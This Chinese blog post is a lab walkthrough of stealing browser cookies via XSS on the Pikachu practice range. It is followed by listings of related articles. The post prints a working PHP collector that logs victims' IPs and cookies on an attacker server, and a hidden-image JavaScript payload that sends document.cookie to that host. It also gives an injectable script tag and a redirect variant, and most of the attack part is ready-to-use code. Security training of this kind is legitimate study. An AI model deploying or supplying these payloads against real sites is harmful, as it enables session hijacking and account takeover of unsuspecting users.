XSS接收cookie

已于 2022-11-28 09:41:35 修改
阅读量676 收藏 2
点赞数 2
分类专栏: web安全 文章标签: xss
于 2021-10-20 16:45:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/120868734
版权

XSS接收cookie

环境

VPS winserver2012R2 phpstudy apache php
靶机 win10 phpstudy apache php pikachu

vps放置

1.getcookie.php

<?php 

$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$cookie=$_GET['cookie'];
$fp = fopen('cookie.txt',"a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?>

2.getcookie.js

var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://ip/cookie/getcookie.php?cookie= '+encodeURIComponent(document.cookie);

3.存在xss的页面写入

<script src="http://ip/cookie/getcookie.js"></script>

另一种方式 会自动跳转到钓鱼页面, 会被用户发现。

<script>document.location='http://ip/cookie/getcookie.php?cookie='+document.cookie</script>

document.location 会跳转到指定页面

4. 攻击尝试

vps准备好 代码后
在pikachu靶场存在xss漏洞的页面中写入 3 中的xss代码

在这里插入图片描述

5.结果

VPS 上出现cookie.txt
在这里插入图片描述
在这里插入图片描述

apache log日志中也存在
在这里插入图片描述

LuckyCharm~
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS获取COOKIE
04-20
XSS获取COOKIE
接收Cookie总结
网络安全。
01-14 3352
0x01 前言 最近总结了一下自己接收cookie的方法,和大家分享一下。来源于平时的积累和良师益友的分享。 0x02 进入正题 一:通过XSS平台接收cookie。 这个相信每个人都用过,是大家接收cookie最常用的一种方式。 1.去网上的XSS平台或者自己搭建的XSS平台新建一个项目。 2.在这里我们勾选默认模块,默认模块就是盗取cookie的,然后选择keepsession。 3.然后...
XSS免费接收平台以及模拟钓鱼一键生成测试
最新发布
vetus1的博客
07-05 982
XSS平台测试钓鱼一键测试
构造个人轻量级XSS平台获取管理员cookie并登录
weixin_30401605的博客
02-12 487
一、前言 本平台是个人轻量级XSS测试平台,仅作为练习参考。 二、实验环境 服务器操作系统:Centos 7 Web容器:Apache 三、平台搭建过程 安装Apache 安装PHP 安装Git工具 从GitHub克隆XSS平台源码 # 删除默认网站内容 rm -rf /var/www/* # 创建新的网站目录 mkdir /var/www/xss ...
简单xss接收cookie平台的搭建以及xsscookie的一些总结
..
01-27 4009
接收平台的搭建_BlueLotus_XSSReceiver 这个是搭建教程: 打Cookie小工具_BlueLotus_XSSReceiver 链接:百度网盘 请输入提取码提取码:tdoj 我是将其搭在服务器上,模拟最真实的攻击环境。搭在服务器上需要几个条件,一是得有apache服务,二是得有php环境。 Linux环境搭建:CentOs + Apache + MySQL + PHP - 云+社区 - 腾讯云 下面说一下在搭建过程中踩的坑。 一、在上传的时候直接上传解压好的_Blue...
XSS数据接收平台——蓝莲花(BlueLotus)
p36273的博客
06-17 6101
蓝莲花平台是清华大学曾经的蓝莲花战队搭建的平台,该平台用于接收xss返回数据。用xss数据接收平台的好处:正常执行反射型xss和存储型xss,反射型xss在执行poc时,会直接在页面弹出执行注入的poc代码;存储型则是,在将poc代码注入用户的系统中后,用户访问有存储型xss的地方,也会弹出执行的poc代码,即如下图所示;而使用这种数据接收平台,在用户页面就不会再弹出这个窗口,但在数据接收平台还是可以获取到用户的cookie,以免被用户发觉。
第二节 XSS盗取cookie-01
09-15
在攻击者的服务器上,攻击者可以使用PHP代码来接收和存储用户的Cookie信息。例如: ```php $cookie=$_GET['cookie']; file_put_contents('cookie.txt',$cookie); ?> ``` 这段代码将用户的Cookie信息写入到`cookie....
xss Cookie
10-09
XSS漏洞与Cookie利用详解》 XSS(Cross Site Scripting),中文名为跨站脚本攻击,是一种常见的网络安全漏洞,主要发生在Web应用程序中。它允许攻击者在用户浏览器上注入恶意脚本,从而窃取用户的敏感信息,如...
cookie实现自动登入
10-10
2. **限制路径与域**:Cookie的路径属性应限制在应用的特定目录下,防止跨站脚本攻击(XSS)。域属性确保Cookie只在指定的顶级域名下有效,避免信息泄露。 3. **安全与HttpOnly标志**:设置`Secure`标志确保Cookie...
Web应用安全:XSS盗取cookiepayload(实验习题).docx
06-17
3. 攻击者就可以接收到管理员发送的 Cookie。 防御 XSS 攻击 为了防御 XSS 攻击,需要采取以下措施: 1. 输入验证:验证用户输入的数据,防止恶意脚本的注入。 2. 输出编码:对输出的数据进行编码,以防止恶意...
XSS.zip_XSS_c xss
09-24
1. **谨慎处理字符串**:在接收和处理用户输入时,确保进行适当的边界检查和转义处理。 2. **使用安全的库**:如果使用了Web框架或库,确保它们具有良好的安全记录,并定期更新。 3. **了解Web服务器的安全配置**:...
XSS数据接收平台
2301_81475812的博客
02-16 1400
存储型则是,在将poc代码注入用户的系统中后,用户访问有存储型xss的地方,也会弹出执行的poc代码,即如下图所示;3.我的项目,点击创建,项目名称和描述随便填,之后点击下一步,选择需要的模板,这里选择“基础默认模块”就好,之后点击下一步,项目就创建成功了。4.提交后,显示安装成功,直接点击登录就跳转到,登录控制面板,输入前面的密码,即可登录到XSS接受面板。进入“我的JS”模块输入要创建的模板名,选择要用的模块,点击插入模块,之后点击新增按钮。4.将复制的payload,放到dvwa的xss模块执。
使用XSS漏洞获取cookies
Decaede的博客
01-26 1174
使用XSS漏洞获取cookies
ctf xss利用_利用存储型XSS跨站漏洞偷取用户Cookie实战
weixin_42611310的博客
02-23 1608
声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...
xss获取cookie
kiihuang的博客
03-31 880
主要是借助存储型xss漏洞,来进行攻击的,获取每个访问人的cookie
XSS获取Cookie过程简单演示
热门推荐
qq_36609913的博客
01-15 2万+
XSS: 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 本次演示将通过DVWA平台进行 实例: 打开
cookie获取与xss
baidu_41942652的博客
04-28 453
首先打开pikachu平台,找到反射型xss(get)章节。 打开后台 登录账号 将字数限制去掉 然后输入一个的script语句 然后可以在后台看见用户访问的cookie信息 这样一次cookie获取就成功了! ...
使用xss来打cookie
weixin_60719780的博客
11-11 1095
在我们的xss平台上,我们就可以收到一条信息,这也就说明了我们成功拿到cookie值,里面包含了cookie值;下来我们就可以使用cookie值进行登录,无需密码验证,到这里是不是感觉很爽。这里我们使用安全等级低的来做,使用xss存储型,只要大家能够绕过安全的等级(后面我会将存储型的三个等级绕过方式整理出来)下来我们重新使用一个浏览器打开我们的dvwa靶机,找到检查,找到cookie,进行修改。2、这里面有许多模块,自己选择所需要的就行,这里我使用的是默认模块。成功用cookie登录。
xss反弹cookie
07-29
XSS(跨站脚本)攻击是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本来获取用户的敏感信息,如cookie。根据提供的引用内容,可以看出这是一个XSS攻击的示例代码。 引用\[1\]和引用\[2\]是两种不同的XSS...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值